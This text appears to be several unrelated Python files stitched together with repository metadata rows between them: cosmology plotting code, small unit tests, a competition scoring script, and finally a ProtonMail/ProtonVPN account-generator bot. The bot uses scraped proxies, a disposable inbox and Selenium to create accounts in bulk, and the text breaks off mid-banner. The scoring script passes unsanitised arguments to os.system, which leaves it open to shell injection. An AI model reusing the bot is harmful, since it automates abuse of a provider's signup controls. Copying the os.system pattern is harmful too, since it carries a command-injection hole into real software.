plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
# Plot all power spectra and the difference from the fiducial model
cl_fac = ell * (ell + 1) / (2 * np.pi)
for cl, dist_sig in zip(cls_, dist_sigma):
ax[0].plot(ell, cl_fac * cl, alpha=.5, color=colour.to_rgba(dist_sig))
ax[1].plot(ell, (cl - fid_cl) / fid_cl_err, alpha=.5, color=colour.to_rgba(dist_sig))
# Add a few cosmic variance error bars
err_ell = np.array([500, 1000, 1500, 2000])
err_ell_idx = err_ell - lmin
ax[0].errorbar(err_ell, cl_fac[err_ell_idx] * fid_cl[err_ell_idx],
yerr=(cl_fac[err_ell_idx] * 0.5 * fid_cl_err[err_ell_idx]), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (C_\ell)}$')
# Labels, legend and colour bar
ax[1].set_xlabel(r'$\ell$')
ax[0].set_ylabel(r'$C_\ell \times \ell (\ell + 1) ~ / ~ 2 \pi$')
ax[1].set_ylabel(r'$(C_\ell - C_\ell^\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(C_\ell)}$')
ax[0].ticklabel_format(axis='y', style='sci', scilimits=(0, 0))
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cl_perl.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
# Calculate theta range
theta_bin_edges = np.logspace(np.log10(theta_min), np.log10(theta_max), n_theta_bin + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus, _ = like_cf.get_cl2cf_matrices(theta_bin_edges, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec = cl2cf_22plus @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus = cl2cf_22plus[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf = cl2cf_22plus @ fid_cl + stabl_vec
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise = np.einsum('il,jl,l->ij', cl2cf_22plus, cl2cf_22plus, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta = np.cos(theta_bin_edges)
bin_area_new = 2 * np.pi * -1 * np.diff(cos_theta)
npairs = 0.5 * survey_area_sterad * bin_area_new * (gals_per_sterad ** 2) # Friedrich et al. eq 65
fid_cf_noise_var = 2 * sigma_e ** 4 / npairs
fid_cf_err = np.sqrt(np.diag(fid_cf_cov_nonoise) + fid_cf_noise_var)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
fig, ax = plt.subplots(nrows=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.09, right=.99, bottom=.07, top=.97, hspace=0)
bin_edges_deg = np.degrees(theta_bin_edges)
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf = cl2cf_22plus @ cl + stabl_vec
cf_diff = (cf - fid_cf) / fid_cf_err
line_args = {'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0].step(bin_edges_deg, np.pad(cf, (0, 1), mode='edge'), where='post', **line_args)
ax[1].step(bin_edges_deg, np.pad(cf_diff, (0, 1), mode='edge'), where='post', **line_args)
# Add error bars
bin_centres_deg = bin_edges_deg[:-1] + 0.5 * np.diff(bin_edges_deg)
ax[0].errorbar(bin_centres_deg, fid_cf, yerr=(0.5 * fid_cf_err), lw=2, c='black', zorder=5, capsize=5,
ls='None', label=r'Cosmic variance + noise $\sqrt{Var (\xi+)}$')
# Labels, legend and colour bar
plt.xscale('log')
ax[1].set_xlabel(r'$\theta$ (deg)')
ax[0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
ax[0].legend(frameon=False, title='Bin 1 shear')
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_dir is not None:
plot_save_path = os.path.join(plot_save_dir, 'cf_perbin.pdf')
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
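# Illustrative call (hypothetical paths and survey parameters -- substitute the
# real parameter-grid output and noise spectrum):
#     plot_cl_cf('she_cl_grid.npz', 'she_nl.txt', lmin=2, lmax=2000,
#                theta_min=1e-4, theta_max=0.1, n_theta_bin=10,
#                survey_area_sqdeg=15000, gals_per_sqarcmin=3, sigma_e=0.3,
#                plot_save_dir='plots')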
def plot_cf_nbin(diag_she_cl_path, lmin, lmax, theta_min, theta_max, n_bin_1, n_bin_2, survey_area_sqdeg,
gals_per_sqarcmin, sigma_e, l_extrap_to=60000, plot_save_path=None):
"""
Plots signal-to-noise per bin for the full-sky correlation function for two numbers of bins side-by-side, using data
produced with ``param_grids.load_diagonal_shear_cl``.
Args:
diag_she_cl_path (str): Path to output of ``param_grids.load_diagonal_shear_cl``.
lmin (int): Minimum l.
lmax (int): Maximum l.
theta_min (float): Minimum theta.
theta_max (float): Maximum theta.
n_bin_1 (int): Number of theta bins in the left panel.
n_bin_2 (int): Number of theta bins in the right panel.
survey_area_sqdeg (float): Survey area in square degrees.
gals_per_sqarcmin (float): Average number of galaxies per square arcminute per redshift bin.
sigma_e (float): Intrinsic ellipticity dispersion per component.
l_extrap_to (int, optional): The power spectrum is extrapolated to this l prior to the Cl-to-CF transform for
stability, using a l(l+1)-weighted linear extrapolation. Default 60000.
plot_save_path (str, optional): Path to save the plot, if supplied. If not supplied, plot is displayed.
"""
# Load parameters and power spectra
with np.load(diag_she_cl_path) as data:
w0 = data['w0']
wa = data['wa']
cls_nonoise = data['shear_cl_bin_1_1']
# Do some consistency checks
n_samp = len(w0)
assert w0.shape == (n_samp,)
assert wa.shape == (n_samp,)
# Identify fiducial Cls
fid_idx = np.squeeze(np.argwhere(np.isclose(w0, -1) & np.isclose(wa, 0)))
ell = np.arange(lmin, lmax + 1)
# Calculate distance from (-1, 0) with a direction (bottom left being negative)
dist = np.sqrt((w0 - -1) ** 2 + (wa - 0) ** 2) * np.sign(wa)
# Convert distance to units of sigma using the fact that we have 21 points inside +/- 9 sig
# (on the w0-wa posterior from lmax 2000 power spectrum)
onesig = np.mean(np.diff(dist)) * (21 - 1) / 18
dist_sigma = dist / onesig
# Use a diverging colour map over this range
max_dist_sigma = np.amax(np.abs(dist_sigma))
norm = matplotlib.colors.Normalize(-max_dist_sigma, max_dist_sigma)
colour = matplotlib.cm.ScalarMappable(norm, cmap='Spectral')
# Calculate theta range
theta_bin_edges_1 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_1 + 1)
theta_bin_edges_2 = np.logspace(np.log10(theta_min), np.log10(theta_max), n_bin_2 + 1)
# Generate Cl -> binned CF matrix (for xi_plus)
_, cl2cf_22plus_1, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_1, lmin, l_extrap_to)
_, cl2cf_22plus_2, _ = like_cf.get_cl2cf_matrices(theta_bin_edges_2, lmin, l_extrap_to)
# Extrapolate fiducial power spectrum up to l_extrap_to and zero it below lmax
fid_cl = cls_nonoise[fid_idx, :]
extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
fid_cl_extrap = extrap_mat @ fid_cl
# Transform it with transmat to obtain stabilisation vector
stabl_vec_1 = cl2cf_22plus_1 @ fid_cl_extrap
stabl_vec_2 = cl2cf_22plus_2 @ fid_cl_extrap
# Now trim transmat to lmax
cl2cf_22plus_1 = cl2cf_22plus_1[:, :(lmax - lmin + 1)]
cl2cf_22plus_2 = cl2cf_22plus_2[:, :(lmax - lmin + 1)]
# Obtain fiducial CF
fid_cf_1 = cl2cf_22plus_1 @ fid_cl + stabl_vec_1
fid_cf_2 = cl2cf_22plus_2 @ fid_cl + stabl_vec_2
# Calculate error on fiducial CF, including noise
fid_cl_var = 2 * fid_cl ** 2 / (2 * ell + 1)
fid_cf_cov_nonoise_1 = np.einsum('il,jl,l->ij', cl2cf_22plus_1, cl2cf_22plus_1, fid_cl_var)
fid_cf_cov_nonoise_2 = np.einsum('il,jl,l->ij', cl2cf_22plus_2, cl2cf_22plus_2, fid_cl_var)
# Noise contribution
survey_area_sterad = survey_area_sqdeg * (DEG_TO_RAD ** 2)
gals_per_sterad = gals_per_sqarcmin * (60 / DEG_TO_RAD) ** 2
cos_theta_1 = np.cos(theta_bin_edges_1)
cos_theta_2 = np.cos(theta_bin_edges_2)
bin_area_1 = 2 * np.pi * -1 * np.diff(cos_theta_1)
bin_area_2 = 2 * np.pi * -1 * np.diff(cos_theta_2)
npairs_1 = 0.5 * survey_area_sterad * bin_area_1 * (gals_per_sterad ** 2) # Friedrich et al. eq 65
npairs_2 = 0.5 * survey_area_sterad * bin_area_2 * (gals_per_sterad ** 2)
fid_cf_noise_var_1 = 2 * sigma_e ** 4 / npairs_1
fid_cf_noise_var_2 = 2 * sigma_e ** 4 / npairs_2
fid_cf_err_1 = np.sqrt(np.diag(fid_cf_cov_nonoise_1) + fid_cf_noise_var_1)
fid_cf_err_2 = np.sqrt(np.diag(fid_cf_cov_nonoise_2) + fid_cf_noise_var_2)
# Prepare plot
plt.rcParams.update({'font.size': 13})
fig, ax = plt.subplots(nrows=2, ncols=2, sharex=True, figsize=(12.8, 7.9), gridspec_kw={'height_ratios': (2, 1)})
plt.subplots_adjust(left=.07, right=1, bottom=.07, top=.97, hspace=0, wspace=.12)
# Apply trimmed transmat to each power spectrum and add stabilisation vector, and plot
bin_edges_deg_1 = np.degrees(theta_bin_edges_1)
bin_edges_deg_2 = np.degrees(theta_bin_edges_2)
for cl, dist_sig in zip(cls_nonoise, dist_sigma):
cf_1 = cl2cf_22plus_1 @ cl + stabl_vec_1
cf_2 = cl2cf_22plus_2 @ cl + stabl_vec_2
cf_diff_1 = (cf_1 - fid_cf_1) / fid_cf_err_1
cf_diff_2 = (cf_2 - fid_cf_2) / fid_cf_err_2
step_args = {'where': 'post', 'alpha': .5, 'color': colour.to_rgba(dist_sig)}
ax[0, 0].step(bin_edges_deg_1, np.pad(cf_1, (0, 1), mode='edge'), **step_args)
ax[0, 1].step(bin_edges_deg_2, np.pad(cf_2, (0, 1), mode='edge'), **step_args)
ax[1, 0].step(bin_edges_deg_1, np.pad(cf_diff_1, (0, 1), mode='edge'), **step_args)
ax[1, 1].step(bin_edges_deg_2, np.pad(cf_diff_2, (0, 1), mode='edge'), **step_args)
# Add error bars
log_bin_edges_deg_1 = np.log(bin_edges_deg_1)
log_bin_edges_deg_2 = np.log(bin_edges_deg_2)
bin_log_centres_deg_1 = np.exp(log_bin_edges_deg_1[:-1] + 0.5 * np.diff(log_bin_edges_deg_1))
bin_log_centres_deg_2 = np.exp(log_bin_edges_deg_2[:-1] + 0.5 * np.diff(log_bin_edges_deg_2))
error_args = {'lw': 2, 'c': 'black', 'zorder': 5, 'capsize': 5, 'ls': 'None',
'label': r'Cosmic variance + noise $\sqrt{Var (\xi+)}$'}
ax[0, 0].errorbar(bin_log_centres_deg_1, fid_cf_1, yerr=(0.5 * fid_cf_err_1), **error_args)
ax[0, 1].errorbar(bin_log_centres_deg_2, fid_cf_2, yerr=(0.5 * fid_cf_err_2), **error_args)
# Log scale and axis labels
plt.xscale('log')
ax[1, 0].set_xlabel(r'$\theta$ (deg)')
ax[1, 1].set_xlabel(r'$\theta$ (deg)')
ax[0, 0].set_ylabel(r'$\xi^+ (\theta)$')
ax[1, 0].set_ylabel(r'$(\xi^+ - \xi^+_\mathrm{fid}) ~ / ~ \sqrt{\mathrm{Var}(\xi^+)}$')
fig.align_ylabels()
# Panel labels
annot_args = {'xy': (.95, .95), 'xycoords': 'axes fraction', 'ha': 'right', 'va': 'top', 'fontsize': 14}
ax[0, 0].annotate(f'{n_bin_1} $\\theta$ bin{"s" if n_bin_1 > 1 else ""}', **annot_args)
ax[0, 1].annotate(f'{n_bin_2} $\\theta$ bin{"s" if n_bin_2 > 1 else ""}', **annot_args)
# Colour bar
cb = plt.colorbar(colour, ax=ax, fraction=.10, pad=.01)
cb.set_label(r'Posterior distance from fiducial model in $\sigma$' + '\n(from power spectrum)', rotation=-90,
labelpad=25)
if plot_save_path is not None:
plt.savefig(plot_save_path)
print('Saved ' + plot_save_path)
else:
plt.show()
def get_extrap_mat(lmin, lmax_in, l_extrap_to):
"""
Generate the power spectrum extrapolation matrix, which is used to extrapolate the power spectrum to high l
to stabilise the Cl-to-CF transform.
This matrix should be (pre-)multiplied by the fiducial power spectrum, then all (pre-)multiplied by the Cl-to-CF
transformation matrix, to produce a 'stabilisation vector' which can be added to any correlation function vector to
stabilise it. Generally the same stabilisation vector should be used for all points in parameter space, to avoid
biases. Note that the extrapolation matrix zeros all power below lmax_in, i.e. it does not give a concatenation of
the original power spectrum and the extrapolated section, but just solely the extrapolated section.
The extrapolation is linear with an l(l+1) weighting, achieved using a block matrix. See extrapolation_equations.pdf
for the derivation of its elements.
Args:
lmin (int): Minimum l in the power spectrum.
lmax_in (int): Maximum l prior to extrapolation.
l_extrap_to (int): Maximum l to which to extrapolate.
Returns:
2D numpy array: Extrapolation matrix.
"""
zero_top = np.zeros((lmax_in - lmin + 1, lmax_in - lmin + 1))
zero_bottom = np.zeros((l_extrap_to - lmax_in, lmax_in - lmin + 1 - 2))
ell_extrap = np.arange(lmax_in + 1, l_extrap_to + 1)
penul_col = (-ell_extrap + lmax_in) * lmax_in * (lmax_in - 1) / (ell_extrap * (ell_extrap + 1))
final_col = (ell_extrap - lmax_in + 1) * lmax_in * (lmax_in + 1) / (ell_extrap * (ell_extrap + 1))
extrap_mat = np.block([[zero_top], [zero_bottom, penul_col[:, np.newaxis], final_col[:, np.newaxis]]])
return extrap_mat
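# Sketch of how the extrapolation matrix is combined with the Cl-to-CF matrix
# in the plotting functions above (variable names are illustrative):
#     extrap_mat = get_extrap_mat(lmin, lmax, l_extrap_to)
#     stabl_vec = cl2cf_matrix @ (extrap_mat @ fid_cl)    # high-l tail only
#     cl2cf_trimmed = cl2cf_matrix[:, :(lmax - lmin + 1)]
#     cf = cl2cf_trimmed @ cl + stabl_vec                 # stabilised CF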
| 47.862637
| 120
| 0.662438
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,035
| 0.4038
|
3c821672ff666bf16f14e39715a6449abc332ecc
| 1,182
|
py
|
Python
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
datacraft-dsc/starfish-py
|
95ff24410f056e8e2d313c3af97439fe003e294a
|
[
"Apache-2.0"
] | 4
|
2019-02-08T03:47:36.000Z
|
2019-10-17T21:45:23.000Z
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
datacraft-dsc/starfish-py
|
95ff24410f056e8e2d313c3af97439fe003e294a
|
[
"Apache-2.0"
] | 81
|
2019-02-09T01:01:51.000Z
|
2020-07-01T08:35:07.000Z
|
tests/integration/test_use_cases/test_18_confirm_purchase.py
|
oceanprotocol/ocean-py
|
318ad0de2519e61d0a301c040a48d1839cd82425
|
[
"Apache-2.0"
] | 1
|
2021-01-28T12:14:03.000Z
|
2021-01-28T12:14:03.000Z
|
"""
test_18_confirm_purchase
As a developer building a service provider Agent for Ocean,
I need a way to confirm if an Asset has been successfully purchased so that
I can determine whether to serve the asset to a given requestor
"""
import secrets
import logging
import json
from starfish.asset import DataAsset
def test_18_confirm_purchase(resources, config, remote_agent_surfer, convex_accounts):
purchaser_account = convex_accounts
test_data = secrets.token_bytes(1024)
asset_data = DataAsset.create('TestAsset', test_data)
asset = remote_agent_surfer.register_asset(asset_data)
assert(asset)
listing = remote_agent_surfer.create_listing(resources.listing_data, asset.did)
listing.set_published(True)
logging.debug("confirm_purchase for listingid: " + listing.listing_id)
response = remote_agent_surfer.update_listing(listing)
logging.debug("update_listing response: " + str(response))
assert(response)
status = 'ordered'
purchase = remote_agent_surfer.purchase_asset(listing, purchaser_account, None, status)
assert(purchase['listingid'] == listing.listing_id)
assert(purchase['status'] == status)
| 35.818182
| 91
| 0.764805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 348
| 0.294416
|
3c8705d494d8a3a52f621df0705a17180cb44780
| 1,230
|
py
|
Python
|
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | 1
|
2015-11-06T00:46:56.000Z
|
2015-11-06T00:46:56.000Z
|
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | null | null | null |
blaze/expr/tests/test_datetime.py
|
vitan/blaze
|
0cddb630ad1cf6be3967943337529adafa006ef5
|
[
"BSD-3-Clause"
] | null | null | null |
from blaze.expr import TableSymbol
from blaze.expr.datetime import isdatelike
from blaze.compatibility import builtins
from datashape import dshape
import pytest
def test_datetime_dshape():
t = TableSymbol('t', '5 * {name: string, when: datetime}')
assert t.when.day.dshape == dshape('5 * int32')
assert t.when.date.dshape == dshape('5 * date')
def test_date_attribute():
t = TableSymbol('t', '{name: string, when: datetime}')
expr = t.when.day
assert eval(str(expr)).isidentical(expr)
def test_invalid_date_attribute():
t = TableSymbol('t', '{name: string, when: datetime}')
with pytest.raises(AttributeError):
t.name.day
def test_date_attribute_completion():
t = TableSymbol('t', '{name: string, when: datetime}')
assert 'day' in dir(t.when)
assert 'day' not in dir(t.name)
assert not builtins.all([x.startswith('__') and x.endswith('__')
for x in dir(t.name)])
def test_datetime_attribute_name():
t = TableSymbol('t', '{name: string, when: datetime}')
assert 'when' in t.when.day._name
def test_isdatelike():
assert not isdatelike('int32')
assert isdatelike('?date')
assert not isdatelike('{is_outdated: bool}')
| 29.285714
| 68
| 0.669919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 259
| 0.210569
|
3c8be6bc259868341293934801c28e199c01bfba
| 1,539
|
py
|
Python
|
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
dac4automlcomp/score.py
|
automl/dac4automlcomp
|
f1a8b4e2f0fc85ad19b86aa41856496732fed901
|
[
"Apache-2.0"
] | null | null | null |
import argparse
import os
import time
import gym
import warnings
# Parts of the code are inspired by the AutoML3 competition
from sys import argv, path
from os import getcwd
from os.path import join
verbose = True
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="The experiment runner for the DAC4RL track."
)
parser.add_argument(
"-t",
"--competition-track",
choices=['dac4sgd', 'dac4rl'],
help="DAC4SGD or DAC4RL",
default="dac4rl",
)
parser.add_argument(
"-i",
"--input-dir",
type=str,
default="",
help="",
)
parser.add_argument(
"-o",
"--output-dir",
type=str,
default="",
help="",
)
root_dir = getcwd()
print("Working directory:", root_dir)
args, unknown = parser.parse_known_args()
output_dir = os.path.abspath(args.output_dir)
if verbose:
print("Using output_dir: " + output_dir)
if not os.path.exists(args.output_dir):
print("Path not found:", args.output_dir)
os.makedirs(args.output_dir)
if os.path.exists(args.output_dir):
print("Output directory contents:")
os.system("ls -lR " + args.output_dir)
if os.path.exists(args.input_dir):
os.system("cp " + args.input_dir + "/res/scores.txt " + args.output_dir)
else:
print("No results from ingestion!")
with open(args.output_dir + '/scores.txt', 'r') as fh:
print(fh.readlines())
| 23.676923
| 80
| 0.59974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 387
| 0.251462
|
3c8c318c871167bf3f056e1a05ea008558ab1c56
| 78
|
py
|
Python
|
tests/test_test.py
|
Smirenost/volga
|
109191ee994e99a831d90f3e8aa1d82fc766ca8b
|
[
"MIT"
] | 1
|
2020-11-05T23:40:02.000Z
|
2020-11-05T23:40:02.000Z
|
tests/test_test.py
|
Smirenost/volga
|
109191ee994e99a831d90f3e8aa1d82fc766ca8b
|
[
"MIT"
] | 3
|
2020-11-05T23:46:34.000Z
|
2020-11-12T22:42:12.000Z
|
tests/test_test.py
|
Smirenost/volga
|
109191ee994e99a831d90f3e8aa1d82fc766ca8b
|
[
"MIT"
] | null | null | null |
from volga.json import foo_test
def test_mock():
assert 1 == foo_test()
| 13
| 31
| 0.692308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3c8d359a9fdb99a983fada9faf82eacea1c12723
| 11,067
|
py
|
Python
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 5
|
2020-04-03T13:57:07.000Z
|
2022-03-11T03:20:14.000Z
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 2
|
2020-10-15T20:26:44.000Z
|
2021-05-29T09:36:10.000Z
|
emails.py
|
kotx/proton-vpn-account-generator
|
8f99093cdf1d0244a91493a09d2e37a02721d144
|
[
"MIT"
] | 5
|
2020-04-03T13:57:08.000Z
|
2022-01-23T08:52:16.000Z
|
# 🚀 This project is in its early stages of development.
# 📌 Working on new features and main menu.
# ⚠️ Any Questions or Suggestions please Mail to: hendriksdevmail@gmail.com
# 🖥 Version: 1.0.0
from selenium import webdriver
from colorama import Fore, Back, Style
import warnings
import time
import random
import string
import urllib.request
import requests
import csv
import sys
from proxyscrape import create_collector
import os
clear = lambda: os.system('clear')
clear()
collector = create_collector('my-collector', 'https')
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
time.sleep(15)
restart = 2
while (restart > 1):
    # Pick an email for Verification. Replace 'YourEmail@Mail.com' with an email address. (You can use 10min mail for this)
# verifymail = input('\033[31m' + "Enter Email Adress for Verification: " + '\033[0m')
verifymail = ''
# f = open('./input_emails.txt')
# verifymail = f.readline().trim()
# verifymail = 'itlammhewuicxfmhco@ttirv.org'
    # Pick an email for Notification. Replace 'YourEmail@Mail.com' with an email address. (You can use 10min mail for this)
# notifymail = input('\033[31m' + "Enter Email Adress for Recovery: " + '\033[0m')
notifymail = ''
# notifymail = 'itlammhewuicxfmhco@ttirv.org'
proxy_status = "false"
while (proxy_status == "false" and False):
# Retrieve only 'us' proxies
proxygrab = collector.get_proxy({'code': ('in')})
proxy = ("{}:{}".format(proxygrab.host, proxygrab.port))
print ('\033[31m' + "Proxy:", proxy + '\033[0m')
try:
proxy_host = proxygrab.host
proxy_port = proxygrab.port
proxy_auth = ":"
proxies = {'http':'http://{}@{}:{}/'.format(proxy_auth, proxy_host, proxy_port)}
requests.get("http://example.org", proxies=proxies, timeout=1.5)
except OSError:
print ('\033[31m' + "Proxy Connection error!" + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "false"
else:
print ('\033[31m' + "Proxy is working..." + '\033[0m')
time.sleep(1)
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
proxy_status = "true"
else:
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support.select import Select
warnings.filterwarnings("ignore", category=DeprecationWarning)
options = Options()
email_driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
email_url = 'https://www.guerrillamail.com/'
email_driver.get(email_url)
time.sleep(4)
# # print(driver.find_element_by_id('inbox-id').text)
email = email_driver.find_element_by_id('inbox-id').text + '@';
domain_name = Select(email_driver.find_element_by_id('gm-host-select')).first_selected_option.text
# # domain_name = email_driver.find_element_by_id('gm-host-select').text
email += domain_name
# print(domain_name)
print(email)
# f = open('./input_emails.txt', 'w')
# f.write(email)
verifymail = email
# email_driver.find_element_by_partial_link_text('verification').click()
# options.add_argument('--proxy-server={}'.format(proxy))
# Change Path to Chrome Driver Path (or move your ChromeDriver into the project folder)
driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
# url = 'http://protonmail.com/signup'
url = 'http://account.protonvpn.com/signup'
#url =
def randomStringDigits(stringLength=13):
# Generate a random string of letters and digits
lettersAndDigits = string.ascii_letters + string.digits
return ''.join(random.choice(lettersAndDigits) for i in range(stringLength))
def getUserName():
f = open('lastused.txt')
val = int(f.readline())
f.close()
f = open('lastused.txt', 'w')
val += 1
f.write(str(val))
return 'wowmainia'+str(val - 1)
rngusername = getUserName()
rngpassword = randomStringDigits(15)
driver.get(url)
# time.sleep(10)
# driver.find_element_by_class_name('pm-button w100 mtauto pm-button--primaryborder').click()
# driver.find_element_by_link_text("Get Free").click()
# driver.find_element_by_xpath("/html/body/div[1]/main/main/div/div[4]/div[1]/div[3]/button").click()
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div:nth-child(5) > div:nth-child(1) > div.flex-item-fluid-auto.pt1.pb1.flex.flex-column > button").click()
break
except:
time.sleep(1)
continue
# driver.find_element_by_id('freePlan').click()
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
# time.sleep(4)
# driver.switch_to_frame(0)
# time.sleep(3)
# driver.find_element_by_id('username').send_keys(rngusername)
# time.sleep(1)
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
while True:
try:
driver.find_element_by_id("username").send_keys(rngusername)
driver.find_element_by_id("password").send_keys(rngpassword)
driver.find_element_by_id("passwordConfirmation").send_keys(rngpassword)
driver.find_element_by_id("email").send_keys(verifymail)
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div:nth-child(1) > form > div:nth-child(3) > div > button").click()
break
except:
time.sleep(1)
# driver.switch_to.default_content()
# time.sleep(1)
# driver.find_element_by_id('password').send_keys(rngpassword)
# time.sleep(1)
# driver.find_element_by_id('passwordc').send_keys(rngpassword)
# time.sleep(1)
# driver.switch_to_frame(1)
# time.sleep(1)
# driver.find_element_by_id('notificationEmail').send_keys(notifymail)
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > div > div > div:nth-child(2) > form > div:nth-child(2) > button").click()
break
except:
time.sleep(1)
# time.sleep(60)
# time.sleep(1)
# email_driver.find_element_by_partial_link_text('verification').click()
# email_driver.find_element_by_link_text('notify@protonmail.ch ').click()
while True:
try:
val = email_driver.find_element_by_class_name('email-excerpt').text
if not val[-6:].isnumeric():
raise Exception
print(val[-6:], "verification")
driver.find_element_by_id('code').send_keys(val[-6:])
time.sleep(1)
driver.find_element_by_css_selector('body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > form > div > div > div:nth-child(4) > button').click()
break
except:
time.sleep(1)
# driver.find_element_by_name('submitBtn').click()
# time.sleep(6)
# driver.find_element_by_id('id-signup-radio-email').click()
# time.sleep(1)
# driver.find_element_by_id('emailVerification').send_keys(verifymail)
# time.sleep(1)
# driver.find_element_by_class_name('codeVerificator-btn-send').click()
# time.sleep(3)
    print('\033[31m' + "Your New Email Address is: " + '\033[0m', rngusername, "@protonmail.com", sep='')
    print('\033[31m' + "Your New Email Password is: " + '\033[0m', rngpassword)
complete = "false"
while (complete == "false"):
complete_q = input("Did you complete the Verification process? y/n: ")
if complete_q == "y":
driver.close()
csvData = [[verifymail, rngpassword]]
with open('list.csv', 'a') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(csvData)
csvFile.close()
print ('Great! We added you account details to the table.')
complete = "true"
else:
            print('Please complete the verification and try again')
time.sleep(1)
complete = "false"
else:
restart_s = input("Do you want to restart the Script and create more Accounts? y/n: ")
if restart_s == "y":
        restart += 1
clear()
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
